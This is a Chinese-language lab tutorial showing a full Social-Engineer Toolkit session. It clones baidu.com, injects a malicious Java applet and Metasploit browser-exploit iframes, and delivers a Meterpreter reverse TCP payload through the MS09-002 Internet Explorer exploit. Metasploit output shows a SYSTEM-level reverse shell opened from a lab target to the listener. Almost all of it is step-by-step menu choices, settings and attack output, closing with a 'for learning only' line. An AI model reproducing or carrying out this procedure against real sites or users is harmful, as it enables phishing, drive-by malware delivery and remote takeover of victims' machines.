使用set工具包进行多重攻击,本例中包括的攻击方法由(JAVA Applet、Metasploit客户端渗透攻击、网页劫持攻击)
具体过程如下:(过程有点多,请耐心看)
使用setoolkit进入set工具包
01011001011011110111010100100000011100
10011001010110000101101100011011000111
10010010000001101000011000010111011001
10010100100000011101000110111100100000
01101101011101010110001101101000001000
00011101000110100101101101011001010010
00000110111101101110001000000111100101
10111101110101011100100010000001101000
01100001011011100110010001110011001000
00001110100010110100101001001000000101
01000110100001100001011011100110101101
11001100100000011001100110111101110010
00100000011101010111001101101001011011
10011001110010000001110100011010000110
01010010000001010011011011110110001101
10100101100001011011000010110101000101
01101110011001110110100101101110011001
01011001010111001000100000010101000110
11110110111101101100011010110110100101
11010000100000001010100110100001110101
011001110111001100101010
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 8.0.3
Codename: 'Maverick'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
99) Return to Main Menu
set:webattack>6
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
Select which attacks you want to use:
1. Java Applet Attack Method (OFF)
2. Metasploit Browser Exploit Method (OFF)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Web Jacking Attack Method (OFF)
6. Use them all - A.K.A. 'Tactical Nuke'
7. I'm finished and want to proceed with the attack
99. Return to Main Menu
set:webattack:multiattack> Enter selections one at a time (7 to finish):1
[-] Turning the Java Applet Attack Vector to ON
[*] Option added. You may select additional vectors
Select which additional attacks you want to use:
1. Java Applet Attack Method (ON)
2. Metasploit Browser Exploit Method (OFF)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Web Jacking Attack Method (OFF)
6. Use them all - A.K.A. 'Tactical Nuke'
7. I'm finished and want to proceed with the attack
99. Return to Main Menu
set:webattack:multiattack> Enter selections one at a time (7 to finish):2
[-] Turning the Metasploit Client Side Attack Vector to ON
[*] Option added. You may select additional vectors
Select which additional attacks you want to use:
1. Java Applet Attack Method (ON)
2. Metasploit Browser Exploit Method (ON)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Web Jacking Attack Method (OFF)
6. Use them all - A.K.A. 'Tactical Nuke'
7. I'm finished and want to proceed with the attack
99. Return to Main Menu
set:webattack:multiattack> Enter selections one at a time (7 to finish):5
[-] Turning the Web Jacking Attack Vector to ON
[*] Option added. You may select additional vectors
Select which additional attacks you want to use:
1. Java Applet Attack Method (ON)
2. Metasploit Browser Exploit Method (ON)
3. Credential Harvester Attack Method (ON)
4. Tabnabbing Attack Method (OFF)
5. Web Jacking Attack Method (ON)
6. Use them all - A.K.A. 'Tactical Nuke'
7. I'm finished and want to proceed with the attack
99. Return to Main Menu
set:webattack:multiattack> Enter selections one at a time (7 to finish):
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: zprRppE
[*] Malicious java applet website prepped for deployment
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
What payload do you want to generate:
Name: Description:
1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through powershell injection
2) Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via powershell injection
3) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
5) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec
7) Import your own executable Specify a path for your own executable
8) Import your own commands.txt Specify payloads to be sent via command line
set:payloads>1
set:payloads> PORT of the listener [443]:
Select the payload you want to deliver via shellcode injection
1) Windows Meterpreter Reverse TCP
2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
4) Windows Meterpreter (ALL PORTS) Reverse TCP
set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] Prepping website for pyInjector shellcode injection..
[*] Base64 encoding shellcode and prepping for delivery..
[*] Multi/Pyinjection was specified. Overriding config options.
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[-------------------------------------------]
Java Applet Configuration Options Below
[-------------------------------------------]
Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.
Enter the number you want to use [1-3]: 2
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(
Enter the browser exploit you would like to use [8]:
1) Adobe Flash Player ByteArray Use After Free (2015-07-06)
2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
8) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
9) Java Applet JMX Remote Code Execution (2013-01-10)
10) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
11) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
12) Java 7 Applet Remote Code Execution (2012-08-26)
13) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
14) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
15) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
16) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
17) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
18) Adobe Flash Player Object Type Confusion (2012-05-04)
19) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
20) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
21) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
22) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
23) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
24) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
25) Internet Explorer CSS Import Use After Free (2010-11-29)
26) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
27) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
28) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
29) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
30) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
31) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
32) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
33) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
34) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
35) Microsoft Help Center XSS and Command Execution (2010-06-09)
36) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
37) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
38) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
39) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
40) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
41) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
42) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
43) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
44) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
46) Metasploit Browser Autopwn (USE AT OWN RISK!)
set:payloads>39
[!] ERROR:Something is running on port 80. Attempting to see if we can stop Apache...
[!] Apache may be running, do you want SET to stop the process? [y/n]: [*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[*] Attempting to stop apache.. One moment..
Stopping apache2 (via systemctl): apache2.service.
[*] Success! Apache was stopped. Moving forward within SET...
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[!] The following modules could not be loaded!..\
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] Please see /root/.msf4/logs/framework.log for details.
.~+P``````-o+:. -o+:.
.+oooyysyyssyyssyddh++os-`````````````````````
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///
`...............` `...-/////...`
.::::::::::-. .::::::-
.hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
:Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
.sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
-Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
-Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
`oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
.yNmMMh//+syysso-``````-mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
.shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/
`///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
/MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
-hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
.sMMmo. -dMd--:mN/` ||--X--|| ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================
Press ENTER to size up the situation
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Press SPACE BAR to continue
=[ metasploit v6.0.43-dev ]
+ -- --=[ 2129 exploits - 1137 auxiliary - 363 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: When in a module, use back to go
back to the top level prompt
[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use windows/browser/ms09_002_memory_corruption
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.1.113
LHOST => 192.168.1.113
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set//meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.113:443
msf6 exploit(windows/browser/ms09_002_memory_corruption) > [*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.113:8080/
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Session ID 1 (192.168.1.113:443 -> 192.168.1.115:1464) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is notepad.exe (2432) as: NT AUTHORITY\SYSTEM
[*] Session is already Admin and System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (772)
[*] 192.168.1.115 ms09_002_memory_corruption - Sending MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
[+] Successfully migrated to services.exe (772) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.115:1464) at 2021-06-22 21:19:00 +0800
[*] Sending stage (175174 bytes) to 192.168.1.114
使用靶机访问192.168.1.113(测试主机ip)的443、8080端口,就可以在测试主机看到sessions,之后就不再赘述了。
本文详细介绍了使用set工具包进行多重攻击,仅供学习。